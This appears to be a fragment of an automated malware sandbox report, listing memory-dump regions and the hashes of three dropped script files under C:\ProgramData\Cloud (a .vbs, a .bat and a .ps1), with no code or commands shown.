SHA512 f240dcfc7adcca3140cdc2f8f387ac2053a7fd6e5e474a4008cf38d03506f99e361a5d6e970480ab1155ad00531b9d9095ed2a502ad09e7e442cdf7bcf932320

memory/4056-32-0x00007FF89DB60000-0x00007FF89E621000-memory.dmp

C:\ProgramData\Cloud\cloud.vbs

MD5 7079642a22a106d0ed6f227cc70899ae
SHA1 60dd57af3518c0ea4104379ad233b5982b231283
SHA256 b098e1055dc3dd3156236ee515e5dfbefd746d84578197f2309968625b831724
SHA512 ca1e9e201785fa611520ee2585208fb0684fd338ff1ab1d515523e03677ac4ac1ca5353fdc17bcba4c6c39aa37f9be182c5f7187b8dd9520c8604a001bd69f80

C:\ProgramData\Cloud\cloud.bat

MD5 b8bdfc7895feaaacba3711d17be6778a
SHA1 fa0bc12827b348fe540a13683897deb207650df7
SHA256 e209153dda335fec8fa021f1022c4f9fe041cb527c2b9068eb9ec911429f20a3
SHA512 ea91a8262eacba0bcd6f692b5141124d7fedc98507ad6ab71ade565b347fe328780221f6972cc5c98a9471662474bf8c93e1219d241ff5f90579f7f8e8dd5156

C:\ProgramData\Cloud\cloud.ps1

MD5 81fe8fe5684ecf16d936250bb94c852a
SHA1 a0a18d8d75e12546baa0b7dfd0dfb02dbefbac40
SHA256 ca0713d77d71359ff692385a2bb92e0b22fe7f0db9a356fd4ffbbfeb34911584
SHA512 d0a35efecc947e2e5d99d3f58a494693d5ebd48635f749f87f341e0a1ce965b7a413754a0316c973eebac4c8e8a12315a916adbc4350a0819132debde1ea7013

memory/744-46-0x000001B404780000-0x000001B40478E000-memory.dmp

memory/1816-47-0x0000000001210000-0x0000000001228000-memory.dmp

memory/1816-49-0x00000000031D0000-0x00000000031E6000-memory.dmp

memory/1816-50-0x0000000006140000-0x00000000066E4000-memory.dmp

memory/1816-51-0x0000000005D30000-0x0000000005DC2000-memory.dmp

memory/1816-52-0x0000000005D00000-0x0000000005D0A000-memory.dmp

memory/1816-53-0x0000000006AD0000-0x0000000006B6C000-memory.dmp

memory/1816-54-0x0000000006A30000-0x0000000006A96000-memory.dmp